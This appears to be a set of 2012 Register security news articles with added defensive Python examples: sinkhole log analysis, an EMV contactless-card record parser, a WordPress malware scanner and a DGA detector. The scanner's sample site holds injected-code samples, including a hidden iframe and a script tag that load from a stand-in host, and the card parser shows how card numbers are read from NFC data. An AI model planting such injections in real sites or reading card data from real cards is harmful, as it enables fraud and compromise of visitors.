STE WILLIAMS

Microsoft censors Pirate Bay links from IM

Microsoft has confirmed that users of its instant messaging app will not be able to send each other links to popular torrent site The Pirate Bay, citing malware fears.

“We block instant messages if they contain malicious or spam URLs based on intelligence algorithms, third-party sources, and/or user complaints. Pirate Bay URLs were flagged by one or more of these and were consequently blocked,” Redmond told The Register in an emailed statement.

One can understand banning links to malware, even if that’s something that IM providers have been less than successful at managing in the past. But Redmond’s ban does rather raise the question as to why Pirate Bay has been singled out for blocking, when there are plenty of other sites to choose from, many with a much worse record for malware content than the Swedish site.

When asked about this, Microsoft declined to give any more details of its censorship choice. Certainly Pirate Bay is still the most popular torrent indexing site – even if, strictly speaking, it’s not indexing torrents any more. But none of the security vendors with whom El Reg has spoken says it’s any worse than others, and having such a large and comment-happy user base actually provides more protection, since malware torrents are flagged up earlier than on less-popular sites.

Torrent sites are certainly a security problem. Security vendors at the recent RSA 2012 conference repeatedly lambasted the technology for allowing users to bypass security perimeter controls and download malware directly, while grudgingly acknowledging that the technology has legitimate uses. The same arguments were being made five years ago about peer-to-peer technology.

There’s plenty of legitimate material for download using Pirate Bay’s feeds, and that too is being censored by Microsoft’s move to block all links, not just those that it knows contain malware. It would be difficult, expensive, and largely a waste of time to identify each link that contained malware and just ban those, since new ones can be created faster than they can be banned.

But in singling out this target, Redmond is opening itself up to claims that it is joining the global jihad against Pirate Bay – certainly its lack of explanation for targeting just that site and not others invites the claim. The owners of the Pirate Bay are still enmeshed in legal problems, and the group appears to be willing to consider highly unorthodox measures to keep the service up and running – and this latest move will not help the site’s operators. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/microsoft_censors_pirate_bay_im/

TSA bars security guru from perv scanner testimony

Security expert Bruce Schneier was banned at the last minute from testifying before Congress on the efficacy – or otherwise – of the US Transportation Security Administration’s (TSA) much-maligned perv scanners.

Schneier is a long-time critic of the TSA’s policies for screening travelers, and was formally invited to appear before the House Committee on Oversight and Government Reform and the Committee on Transportation and Infrastructure hearings. However, the TSA objected to his presence because he is currently involved in a legal case over the use of said scanners in US airports.

“I was looking forward to sitting next to a TSA person and challenging some of their statements. That would have been interesting,” Schneier told The Register. “The request to appear came from the committee itself, because they’d been reading my stuff on this and thought it would be interesting.”

Schneier, who is currently involved in an Economist debate on just this issue, has criticized the TSA’s procedures as “security theater”, designed to give the appearance of security without actually being effective. He has pointed out that the scanners are easily defeated, and that since people found carrying prohibited items are merely made to give them up and sent on their way, terrorists simply need to send enough people through the system until one of them succeeds.

This isn’t the first time the TSA has been less than willing to have itself subject to anything like the same scrutiny that aircraft passengers are routinely put through. Last year they ducked out of similar hearings at the last minute, apparently because they didn’t want to sit next to representatives from the Electronic Privacy Information Center (EPIC).

The use of the perv scanners is highly controversial. The TSA has spent millions of dollars to buy them, and the industry hired ex–Homeland Security supremo Michael Chertoff as a lobbyist to push the technology. However, there have been numerous examples of people claiming to be able to beat the scanners, concerns about the health implications of scanning, and the so-called “homosexual” pat-downs introduced to encourage people to use them caused a national day of protest.

There are currently several ongoing legal cases against the scanners, including one recent case in which, it is claimed, attractive female subjects were being repeatedly ordered to use the devices. Personal airport searches have to be performed by a member of the same sex as the target, but no such rules are in place for operators of the scanners.

“I think the TSA has really painted themselves into a corner over this,” Schneier told us. “They’ve said the scanners were absolutely necessary for security, and made the pat downs you can have as an alternative so unpleasant. It’s going to be really hard for them to back down, if indeed they can.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/tsa_schneier_congress_block/

Microsoft takes down ZeuS botnets

A Microsoft-led operation resulted in the takedown of key servers associated with the infamous ZeuS and SpyEye banking Trojan botnets on Friday.

Months of investigation culminated in the coordinated seizure of command-and-control servers associated with the botnets and hosted in Scranton, Pennsylvania, and Lombard, Illinois.

The takedown came after Microsoft filed suit against 39 unnamed parties on Monday (16 March) asking for permission to sever the command-and-control structures of these ZeuS botnets. The action follows the same tactics as previous successful takedowns of Waledac, Rustock and Kelihos spam-distribution botnet networks.

In a statement, Microsoft described the ZeuS takedown as its most complex to date. It said the action had the “limited and achievable” aim of disrupting the operations of ZeuS-related cybercrime operations rather than decapitating a zombie network, as in previous operations.

“Cybercriminals have built hundreds of botnets using variants of ZeuS malware. For this action – codenamed Operation b71 – we focused on botnets using ZeuS, SpyEye and Ice-IX variants of the ZeuS family of malware, known to cause the most public harm and which experts believe are responsible for nearly half a billion dollars in damages.

“Due to the unique complexity of these particular targets, unlike our prior botnet takedown operations, the goal here was not the permanent shutdown of all impacted targets. Rather, our goal was a strategic disruption of operations to mitigate the threat in order to cause long-term damage to the cybercriminal organization that relies on these botnets for illicit gain.”

ZeuS and SpyEye are essentially cybercrime toolkits for the creation of customised banking Trojans. These crimeware kits sell for anywhere between $700 and $15,000, depending on the version and features of the kit. Many cybercrime gangs use ZeuS as the launchpad for banking fraud, so there are many different zombie networks at play.

Microsoft has detected more than 13 million suspected infections of ZeuS and SpyEye-related malware worldwide, with more than 3 million in the United States alone.

Friday’s takedown action follows months of work by investigators at Microsoft in co-operation with the Financial Services – Information Sharing and Analysis Center (FS-ISAC) and the National Automated Clearing House Association (NACHA), the US electronic payments association. Net security firm F-Secure is credited with providing major help in analysing the malware featured in the operation. US Marshals accompanied investigators in raids on two hosting firms, during which servers were seized for subsequent analysis. Microsoft’s statement does not clarify the point, but other reports strongly suggest the hosting firms involved were unwittingly playing host to the key infrastructure of the ZeuS botnets rather than acting as accomplices in cybercrime.

The operations resulted in the dismantling of two IP addresses behind the ZeuS ‘command-and-control’ structure. Microsoft has started monitoring 800 domains secured in the operation, helping it to identify thousands of ZeuS-infected computers. ®
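Seizing a C2 domain is only half the job: once it points at a sinkhole, the bots keep beaconing to it, and every distinct source address that sends a bot-style request is a victim to be notified. The script below is an added example of that second half, not Microsoft’s or FS-ISAC’s tooling. The log lines, hostnames and addresses are constructed for the example, and the /gate.php and /config.bin beacon paths are an assumption about ZeuS-style traffic, not something taken from the operation.

```python
"""Turn sinkhole web-server logs into a list of infected hosts (added example)."""
import re
from datetime import datetime
from typing import Dict, Optional, Set

# vhost-combined style: "<vhost> <client> - - [ts] "METHOD PATH HTTP/x" status size "referer" "ua""
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumed beacon signatures (method, path). Anything else - browsers, scanners,
# researchers poking the sinkhole - is ignored so it does not inflate the count.
BEACON_SIGNATURES = {("POST", "/gate.php"), ("GET", "/config.bin")}


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def is_beacon(entry: dict) -> bool:
    return (entry["method"], entry["path"]) in BEACON_SIGNATURES


def victims_by_domain(log_text: str) -> Dict[str, dict]:
    """Per sinkholed domain: distinct beaconing hosts, beacon count, first/last seen."""
    report: Dict[str, dict] = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or not is_beacon(entry):
            continue
        d = report.setdefault(entry["vhost"], {"hosts": set(), "beacons": 0,
                                               "first_seen": None, "last_seen": None})
        d["hosts"].add(entry["ip"])
        d["beacons"] += 1
        ts = entry["ts"]
        if d["first_seen"] is None or ts < d["first_seen"]:
            d["first_seen"] = ts
        if d["last_seen"] is None or ts > d["last_seen"]:
            d["last_seen"] = ts
    for d in report.values():
        d["hosts"] = sorted(d["hosts"])
        d["first_seen"] = d["first_seen"].isoformat()
        d["last_seen"] = d["last_seen"].isoformat()
    return report


def unique_victims(log_text: str) -> Set[str]:
    """One host talking to several seized domains is still one victim."""
    victims: Set[str] = set()
    for d in victims_by_domain(log_text).values():
        victims.update(d["hosts"])
    return victims


# Constructed sample log: two seized domains, three bots, one curious browser visitor.
_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
SAMPLE_LOG = "\n".join([
    'c2-example-one.test 203.0.113.10 - - [23/Mar/2012:09:00:01 +0000] "POST /gate.php HTTP/1.1" 200 0 "-" "%s"' % _UA,
    'c2-example-one.test 198.51.100.7 - - [23/Mar/2012:09:05:44 +0000] "GET /config.bin HTTP/1.1" 200 0 "-" "%s"' % _UA,
    'c2-example-one.test 192.0.2.55 - - [23/Mar/2012:09:07:00 +0000] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0"',
    'c2-example-one.test 203.0.113.10 - - [23/Mar/2012:09:20:01 +0000] "POST /gate.php HTTP/1.1" 200 0 "-" "%s"' % _UA,
    'c2-example-two.test 203.0.113.10 - - [23/Mar/2012:09:30:00 +0000] "POST /gate.php HTTP/1.1" 200 0 "-" "%s"' % _UA,
    'c2-example-two.test 198.51.100.8 - - [23/Mar/2012:09:31:00 +0000] "POST /gate.php HTTP/1.1" 200 0 "-" "%s"' % _UA,
])

if __name__ == "__main__":
    for domain, d in victims_by_domain(SAMPLE_LOG).items():
        print(domain, len(d["hosts"]), "hosts,", d["beacons"], "beacons,", d["first_seen"], "->", d["last_seen"])
    print("unique victims:", sorted(unique_victims(SAMPLE_LOG)))
```

The browser hit on / is deliberately dropped: sinkholes attract scanners and researchers as well as bots, and counting them would overstate the infection figures the article quotes.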

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/zeus_botnet_takedown/

Barclaycard pay-by-bonk fraud risk exposes Amazon’s security

Channel 4 News has found out that pay-by-wave phones are compatible with pay-by-wave cards, and wants something done about it, but it’s web bazaar Amazon that’s lacking basic security.

The investigation, which was carried out by viaForensics at Channel 4’s behest, discovered that one can lift the credit card number, expiry date and customer name from a Barclaycard-issued Visa card, which wouldn’t be such a big deal if Channel 4 News hadn’t also discovered that Amazon isn’t doing the basic checking which would prevent such details being used for fraud.

But Channel 4 pins the blame firmly on Barclaycard, claiming:

“The government has urged Barclays to consider recalling up to 13 million credit and debit cards” after “we found the cards can also be read by mobile phones”.

That shouldn’t be surprising as the cards concerned conform to the NFC (Near-Field Communications) standard, as do modern phones, and there’s an expectation that NFC phones will be able to double up as cheap Point Of Sale terminals in some instances. What Channel 4 News discovered was that some cards give up the customer’s name as well as the other details, and that Amazon’s security procedures are lamentable to say the least.

Online retailers are supposed to check the CVV2 code, the three-digit number on the back of the card, as well as confirming the cardholder’s address. They aren’t allowed to store the CVV2 (in fear of compromised servers) so to enable one-click ordering retailers like Amazon only ask for the code the first time the card is used and then trust the buyer.

Only it seems that Amazon isn’t even bothering to check the CVV2 the first time, so Channel 4 News was able to set up a new account and make purchases on that account using only the card number, expiry date, and name.

ViaForensics, which provided the tech for the probe, is less sensationalist about the data recovered: “Typically this would not be enough information to perform ‘cardholder not present’ transactions because retailers require the CVV2 code printed on the back, and a valid address”, but not in the case of Amazon obviously.

On the other hand, the Barclaycards shouldn’t have been sharing punters’ names, but a straw poll of Visa-backed Barclaycards around El Reg Towers showed they were only prepared to share card number and expiry date as recommended by the EMV specifications, so it’s far from clear what proportion of cards are over-sharing.
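What a card “shares” over NFC is simply the set of EMV data objects it returns to READ RECORD. The following is an added example, not code from the Channel 4 or viaForensics work: a small BER-TLV parser that takes such a record, pulls the PAN and expiry out of the Track 2 equivalent data (tag 57) and reports whether the card also volunteered a cardholder name (tag 5F20). The two records are constructed for the demonstration using a test PAN, not read from a real card; the tag numbers are from the EMV data dictionary.

```python
"""Parse EMV READ RECORD responses and see what a contactless card gives away (added example)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

TAG_TRACK2_EQUIV = 0x57       # PAN, expiry and service code, as on the magstripe
TAG_CARDHOLDER_NAME = 0x5F20  # optional: the name as embossed on the card
TAG_EXPIRY_DATE = 0x5F24      # YYMMDD


def parse_tlv(data: bytes) -> List[Tuple[int, bytes]]:
    """Flatten a BER-TLV byte string into [(tag, value), ...].

    Constructed tags (bit 6 of the first tag byte set, e.g. the 0x70 record
    template) are recursed into so their children appear in the result.
    """
    items = []
    i = 0
    while i < len(data):
        tag = data[i]
        i += 1
        if tag & 0x1F == 0x1F:            # multi-byte tag: read on while bit 8 is set
            while True:
                tag = (tag << 8) | data[i]
                i += 1
                if data[i - 1] & 0x80 == 0:
                    break
        length = data[i]
        i += 1
        if length & 0x80:                 # long form: 0x8N, then N length bytes
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        if len(value) != length:
            raise ValueError("truncated TLV at offset %d" % i)
        i += length
        first_tag_byte = tag >> (8 * ((tag.bit_length() + 7) // 8 - 1))
        if first_tag_byte & 0x20:
            items.extend(parse_tlv(value))
        else:
            items.append((tag, value))
    return items


@dataclass
class CardData:
    pan: str
    expiry_yymm: str
    service_code: str
    cardholder_name: Optional[str]


def luhn_ok(pan: str) -> bool:
    """Luhn check digit test: a cheap sanity check that the PAN was decoded correctly."""
    total = 0
    for pos, ch in enumerate(reversed(pan)):
        d = int(ch)
        if pos % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def extract_card_data(record: bytes) -> CardData:
    fields = dict(parse_tlv(record))
    # Track 2 equivalent data is BCD: PAN, 'D' separator, YYMM, service code,
    # discretionary data, then an F nibble of padding if the digit count is odd.
    track2 = fields[TAG_TRACK2_EQUIV].hex().upper().rstrip("F")
    pan, rest = track2.split("D", 1)
    if not luhn_ok(pan):
        raise ValueError("PAN failed Luhn check")
    raw_name = fields.get(TAG_CARDHOLDER_NAME)
    return CardData(pan=pan, expiry_yymm=rest[:4], service_code=rest[4:7],
                    cardholder_name=raw_name.decode("ascii").strip() if raw_name else None)


def masked(pan: str) -> str:
    """Render a PAN the way a receipt would, so it can be logged without the full number."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def oversharing(card: CardData) -> bool:
    """True if the card handed out more than PAN and expiry over the contactless interface."""
    return card.cardholder_name is not None


# Constructed sample records: test PAN 4111 1111 1111 1111, expiry December 2015.
RECORD_WITH_NAME = bytes.fromhex(
    "70 2B"
    "57 11 4111111111111111D15121010000000000"
    "5F20 0F " + "CARDHOLDER/TEST".encode().hex() +
    "5F24 03 151231"
)
RECORD_WITHOUT_NAME = bytes.fromhex(
    "70 19"
    "57 11 4111111111111111D15121010000000000"
    "5F24 03 151231"
)

if __name__ == "__main__":
    for label, rec in (("card A", RECORD_WITH_NAME), ("card B", RECORD_WITHOUT_NAME)):
        card = extract_card_data(rec)
        print(label, masked(card.pan), card.expiry_yymm, card.cardholder_name,
              "OVERSHARES NAME" if oversharing(card) else "PAN and expiry only")
```

Note what is absent from both records: there is no CVV2 anywhere in the contactless data, which is exactly why the Amazon finding matters more than the card finding.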

Any losses incurred by this kind of fraud would be refunded by Barclaycard, once the customer has jumped through the required hoops, and Amazon will pay a transaction rate that reflects the probability of such fraud. But the reflection it casts on the security of proximity payments will be harder to shake off.

Using a mobile phone to make payments is a good deal more secure: most Android phones don’t even power up the NFC component unless the screen is on. However, consumers are very conservative and won’t warm to the technology if it’s demonstrably vulnerable. Electronic payments involve a chain of participants, and the failure of any link is perceived as a failure of the entire system; proximity payment systems aren’t nearly robust enough to take that kind of confidence knock.

Channel 4 News did a fine job in exposing a weak link in the chain, and one which needs to be fixed, but as is so often the case in security matters it’s the processes that are flawed, not the technology, even if it does make the better headline. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/nfc_security_amazon/

Election poll shot down by DDoS-ers

Two local men have been arrested after an online referendum organised by the University of Hong Kong to poll citizens on their choice of chief executive was disabled in an apparent denial of service attack.

Broadcaster Radio Television Hong Kong (RTHK) reported that the men, aged 17 and 28, were arrested at the weekend after the online poll was disrupted for a large part of Friday and some of Saturday.

The University of Hong Kong’s Public Opinion Program set up the ‘Civic Referendum Project’ because people who live in the Special Administrative Region (SAR) of China are not given the power to vote directly for their CEO – effectively the head of the Hong Kong government.

Instead a pre-selected 1,200-strong Election Committee full of pro-Beijing businessmen is given the task, a fact that is angering a growing number of democracy-hungry locals, especially given that this year’s candidates were universally unpopular and tainted with scandal.

AFP reported that the university’s back-end systems buckled under the huge volume of traffic.

“The system has been very busy,” Robert Chung, director of the university’s program, apparently told reporters. “We suspect it is under systematic attack as there are more than one million clicks on our system every second.”

Chung was reportedly reticent about the potential motive for the attack but it is well known that the Chinese authorities are not a massive fan of free speech and probably viewed the referendum as undermining the result of the real vote – the outcome of which Beijing basically controls.

In any case it has always been nigh on impossible to directly link the Chinese government with specific cyber attacks, although it is widely suspected that it allows so-called patriotic hackers and even more obvious cyber criminals to commit offences as long as they are in the national interest.

A report by US defence contractor Northrop Grumman earlier this month alleged that China’s military relies on academia and the commercial IT sector to boost its R&D efforts in information warfare.

In the end only around 220,000 Hong Kongers were able to take part in the poll, out of a population of seven million, with more than half spoiling their papers to signify that they supported ‘none of the above’ candidates.

Votes could be cast online, via SMS or a smartphone app, as well as in several polling stations in the region. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/hong_kong_vote_hack/

Paedophiles ‘disguise’ child abuse pages as legit websites

Child abusers are latching onto new methods to distribute paedophilic material online, according to an annual report by the Internet Watch Foundation.

The study, published on Monday, reports that paedophiles are ‘disguising’ websites to appear as if they host only legitimate content. However, if an internet user follows a particular digital path they will be able to view vile images and videos of children being sexually abused.

The technique, which has many legitimate applications, is also widely used by paedophiles. IWF experts encountered the tactic nearly 600 times last year. None of the websites in question were hosted in the UK.

Susie Hargreaves, IWF chief executive, explained: “We received reports to our Hotline by online users who have stumbled across these sites. They pose challenges because when the website is accessed directly, only legal content appears.

“However, the reports we receive by the public can be quite detailed and these reporters were sure of what they had seen. Our analysts investigated further and discovered a legitimate web development technique was being used to disguise the website from all those who had not followed a particular digital path to access it.

“Clearly, ordinary online users had still found this content and we’ve been working with analysts in our sister hotlines and with our members to tackle this issue.”

Child abuse portals are using the technique because it masks the true purpose of a site from those who have not followed the correct page path. Secondly, the approach allows commercial child sexual abuse peddlers to use services from legitimate hosting firms.

The IWF also reports that the hosting industry is getting faster at removing paedophile material from its networks. The tiny amount of abusive content hosted on UK networks is typically removed within 60 minutes of notification.

Two years ago the IWF challenged itself to speed up the removal of child sexual abuse content hosted outside the UK. Such content is more likely to feature younger children, and more likely to show the most depraved content featuring sexual activity between adults and children, rape and sexual torture.

Around half of all child sexual abuse images and videos hosted outside of the UK are removed within 10 days. In 2008 they typically stayed available for more than a month. The report shows that IWF members are able to remove child sexual abuse content around 40 per cent more quickly than non-members. In cases where child sexual abuse content is hosted by an IWF member, most (85 per cent) is removed within 10 days and almost all (95 per cent) is removed within 13 days.

Identifying new victims

IWF analysts are able to identify new images of sexual abuse and subsequently alert police to youngsters who may not be known to them but are potentially at immediate risk. Three children who were being sexually abused were rescued during 2011 thanks to information sharing between the IWF and the Child Exploitation and Online Protection (CEOP) Centre.

One child was traced to Sweden, where she was being abused by a relative who subsequently uploaded images of the abuse online. Another two at-risk children were traced to addresses within the UK and also rescued from their abusers.

In total seven children have been rescued since information-sharing arrangements between the IWF and CEOP were put in place two years ago. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/26/iwf_report/

Chrome extensions malware hijacks Facebook profiles

Kaspersky Lab has found malware-laden Chrome extensions, along with a criminal gang playing cat and mouse with Google by releasing several variations of its wares.

The attacks manifest as suggestions to download Facebook apps. Those apps are, alas, not real. Instead they are malware and, in one case, a malware-laden Chrome extension hosted in Google’s very own Chrome Web Store.

The malware pretends to be a Flash Player installer but instead downloads a Trojan which writes messages to a victim’s Facebook profile and automatically Likes certain pages.

The former activity contains an alluring message suggesting your Friends download the same malware. The auto-Liking behaviour is part of a pay-per-Like scheme that helps the criminals to cash in.

Variations on this attack have been around for a few weeks now, Kaspersky says, but the campaign is so far largely confined to Brazil and other Portuguese-speaking nations.

Google is pulling the malware as fast as the criminals can sneak new variants into the Chrome Web Store.

Researcher Fabio Assolini suggests: “Be careful when using Facebook. And think twice before installing a Google Chrome extension.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/25/chrome_web_store_malware_hijacks_facebook_profiles/

Congress warned that military systems may already be pwned

Security experts testifying at hearings held by the US Senate Armed Services Committee on cybersecurity have warned that maintaining a perimeter to keep out spies is unsupportable, and that the US should assume that its networks have already been fully penetrated.

“We’ve got the wrong mental model here,” said Dr. James Peery, director of the Information Systems Analysis Center at Sandia National Laboratories. “I don’t think that we would think that we could keep spies out of our country. We’ve got this model for cyber that says, ‘We’re going to develop a system where we’re not attacked.’ I think we have to go to a model where we assume that the adversary is in our networks. It’s on our machines, and we’ve got to operate anyway.”

The committee heard that the US Department of Defense (DoD) operates over 15,000 networks with around seven million computing devices, and protecting them against hacking was virtually impossible, particularly in light of the increasing complexity of both the devices and the software that runs on them.

The commercial software industry has, of course, realized that the old idea of a perimeter defense is increasingly useless, and groups such as the Jericho Forum have been working for many years on systems that protect data rather than network boundaries. Such principles might be antithetical to the military mind, but Dr. Kaigham Gabriel, current head of DARPA, said that the cost of perimeter control would be huge and most likely ineffective anyway.

“Modern operations will demand the effective use of cyber, kinetic, and combined cyber and kinetic means,” he suggested. “The shelf-life of cyber tools and capabilities is short – sometimes measured in days. To a greater degree than in other areas of Defense, cybersecurity solutions require that DoD develops the ability to build quickly, at scale, and over a broad range of capabilities.”

Cyber arms races are all well and good, but the head of research at the National Security Agency (NSA) Dr. Michael Wertheimer warned that the US is also facing an increasing intelligence gap, as not enough citizens have the skills of online defense. In 2010 there were just 726 computer science PhDs awarded to US citizens, and only 64 of them signed up for government service.

The open session of the committee hearings can be viewed here.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/03/24/congress_dod_pwned/

Hackers booby-trap WordPress site with botnet-weaving Trojan

Malware-flingers are taking advantage of vulnerable WordPress sites as part of an attack ultimately designed to spread an information-stealing botnet agent.

Cybercrooks begin the attack by planting malicious scripts on vulnerable sites. Prospective marks are then lured to compromised sites via spammed messages that purport to come from known legitimate sources including Better Business Bureau and LinkedIn, among others. The crooks use social engineering tactics to entice unsuspecting users to click the link found in the email.

Clicking on links in these spam messages points surfers towards compromised WordPress sites – and not the legitimate sites users might have expected to visit. Redirection scripts on compromised sites expose surfers to a variety of drive-by download attacks that attempt to take advantage of well-known (and already patched) Adobe Reader and Windows flaws to drop malware onto poorly secured Windows PCs.
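Site owners on the receiving end of this usually find out when visitors complain about being bounced somewhere else, and then have to locate the injected code among thousands of theme and plugin files. The scanner below is an added example, not Trend Micro’s or Websense’s analysis: its rules are generic traits of injected PHP and JavaScript (eval-of-decoded-string chains, hidden iframes, document.write(unescape()) and oversized base64 blobs), not signatures of this particular campaign, whose exact code the page does not show. The sample “site” is constructed inline, with a harmless placeholder standing in for the payload.

```python
"""Flag injected code in a WordPress tree with a few obfuscation heuristics (added example)."""
import base64
import re
from typing import Dict, List

# (rule name, pattern). Each is a common trait of injected code rather than of
# hand-written theme or plugin code. Treat hits as leads to read, not verdicts.
RULES = [
    ("php-eval-decode-chain",
     re.compile(r'eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(', re.I)),
    ("hidden-iframe",
     re.compile(r'<iframe[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden'
                r'|width=["\']?0\b|height=["\']?0\b)', re.I)),
    ("js-unescape-write",
     re.compile(r'document\.write\s*\(\s*unescape\s*\(', re.I)),
    ("long-base64-blob",   # one base64 run longer than any sane inline asset in theme PHP
     re.compile(r'[A-Za-z0-9+/]{120,}={0,2}')),
]


def scan_file(text: str) -> List[str]:
    """Names of the rules that fire on one file's contents, sorted for stable output."""
    return sorted(name for name, pattern in RULES if pattern.search(text))


def scan_tree(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map path -> matched rules, listing only files with at least one hit."""
    findings = {}
    for path, text in files.items():
        hits = scan_file(text)
        if hits:
            findings[path] = hits
    return findings


# Constructed sample site. The "payload" is harmless text, encoded only to reproduce the shape.
_PLACEHOLDER = base64.b64encode(b'echo "constructed placeholder, not a real payload"; ' * 3).decode()

SAMPLE_SITE = {
    "index.php": (
        "<?php define('WP_USE_THEMES', true); require './wp-blog-header.php'; ?>\n"
        '<iframe src="http://redirect.example/in.php" width="0" height="0" '
        'style="visibility:hidden"></iframe>\n'
    ),
    "wp-content/themes/demo/header.php": (
        '<?php eval(base64_decode("' + _PLACEHOLDER + '")); ?>\n'
        "<!DOCTYPE html><html><head><?php wp_head(); ?></head><body>\n"
    ),
    "wp-content/themes/demo/footer.php": "<?php wp_footer(); ?></body></html>\n",
    "wp-content/themes/demo/style.css": (
        ".logo { background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUg==); }\n"
    ),
    "wp-content/themes/demo/js/extra.js": (
        "document.write(unescape('%3Cscript src=%22http://redirect.example/x.js%22%3E%3C/script%3E'));\n"
    ),
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_SITE).items():
        print(path, "->", ", ".join(hits))
```

The short data-URI in style.css is there on purpose: the base64 rule uses a length threshold precisely so that ordinary inline assets do not drown the output in false positives. In a real clean-up the next steps are diffing the tree against a pristine copy of the same WordPress, theme and plugin versions, and patching whatever let the attacker write to the files in the first place.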

The attack, which uses the infamous Blackhole Exploit kit, is geared towards spreading the Cridex Trojan, an information-stealing strain of malware. Cridex establishes a botnet from compromised Windows boxen, as explained in a write-up by Trend Micro.

“This malware intercepts browser requests and changes the displayed content according to the configuration, written by the administrator of the botnet,” Trend explains. “This way, cybercriminals can trick users into entering valuable information without raising suspicion. It was also found to generate several random domains using domain generating algorithms (DGA).”
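A bot that generates its rendezvous domains leaves a distinctive trace in DNS logs: a burst of lookups for random-looking names, most of which fail because the operator has only registered one or two of that day’s candidates. The script below is an added example, not Trend Micro’s or M86’s detection, and it does not reproduce the Cridex algorithm, which the page does not describe. It scores registrable labels on generic lexical traits (length, entropy, vowel and digit ratios, consonant runs), then flags any client that burns through several such names with NXDOMAIN and lists the generated-looking names that did resolve, which are the candidate live C2 hosts. The log lines and domains are constructed for the example, and the tiny public-suffix list is an assumption standing in for the real one.

```python
"""Spot DGA-style lookups in DNS logs (added example)."""
import math
from collections import Counter, defaultdict
from typing import Dict

VOWELS = set("aeiou")
# Stand-in for the public suffix list; real code should use the PSL itself.
TWO_LEVEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "com.au", "co.jp", "com.br"}


def registrable_label(qname: str) -> str:
    """'www.theregister.co.uk' -> 'theregister': the label an algorithm would generate."""
    parts = qname.lower().rstrip(".").split(".")
    if len(parts) >= 3 and ".".join(parts[-2:]) in TWO_LEVEL_SUFFIXES:
        return parts[-3]
    if len(parts) >= 2:
        return parts[-2]
    return parts[0]


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def longest_consonant_run(s: str) -> int:
    best = run = 0
    for ch in s:
        run = run + 1 if ch.isalpha() and ch not in VOWELS else 0
        best = max(best, run)
    return best


def dga_score(label: str) -> int:
    """Count the generated-name traits a label shows (0 to 5)."""
    label = label.lower()
    n = len(label)
    if n == 0:
        return 0
    score = 0
    score += n >= 10                                           # long
    score += shannon_entropy(label) >= 3.0                     # many distinct characters
    score += sum(ch in VOWELS for ch in label) / n < 0.2       # unpronounceable
    score += sum(ch.isdigit() for ch in label) / n > 0.2       # digit-heavy
    score += longest_consonant_run(label) >= 4                 # consonant pile-ups
    return score


def looks_generated(label: str, threshold: int = 3) -> bool:
    return dga_score(label) >= threshold


def analyse(log_text: str, min_nx: int = 5) -> Dict[str, dict]:
    """Per client: generated-looking names that got NXDOMAIN, and ones that resolved.

    Log format (constructed): '<iso-timestamp> <client> <qname> <rcode>'.
    A client with >= min_nx distinct failed generated-looking lookups is marked
    suspect; a generated-looking name that did resolve is the candidate live C2.
    """
    clients = set()
    nx = defaultdict(set)
    resolved = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        _ts, client, qname, rcode = fields
        clients.add(client)
        if not looks_generated(registrable_label(qname)):
            continue
        (nx if rcode == "NXDOMAIN" else resolved)[client].add(qname.lower())
    return {
        client: {
            "nx_generated": sorted(nx[client]),
            "resolved_generated": sorted(resolved[client]),
            "suspect": len(nx[client]) >= min_nx,
        }
        for client in clients
    }


# Constructed sample: one clean workstation and one that is walking a generated list.
SAMPLE_DNS_LOG = """\
2012-03-23T09:00:01Z 10.0.0.23 www.google.com NOERROR
2012-03-23T09:00:02Z 10.0.0.23 en.wikipedia.org NOERROR
2012-03-23T09:00:03Z 10.0.0.23 www.theregister.co.uk NOERROR
2012-03-23T09:00:04Z 10.0.0.23 update.example.net NXDOMAIN
2012-03-23T09:01:00Z 10.0.0.42 xk3qzvmwph.com NXDOMAIN
2012-03-23T09:01:01Z 10.0.0.42 tqrzbkdnsj.ru NXDOMAIN
2012-03-23T09:01:02Z 10.0.0.42 vwqlpxkzmf.net NXDOMAIN
2012-03-23T09:01:03Z 10.0.0.42 hjzqkwbtxr.com NXDOMAIN
2012-03-23T09:01:04Z 10.0.0.42 pkzvxqmwlt.biz NXDOMAIN
2012-03-23T09:01:05Z 10.0.0.42 zqwkxhbvpt.com NOERROR
2012-03-23T09:01:06Z 10.0.0.42 www.google.com NOERROR
"""

if __name__ == "__main__":
    for client, r in sorted(analyse(SAMPLE_DNS_LOG).items()):
        print(client, "SUSPECT" if r["suspect"] else "ok",
              len(r["nx_generated"]), "failed generated lookups; resolved:", r["resolved_generated"])
```

Lexical scoring alone will misfire on CDN hostnames and the like, so the client-level NXDOMAIN count does the real work: a legitimate host rarely fails five random-looking lookups in a row, whereas a bot does so every day until it finds the name its operator registered.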

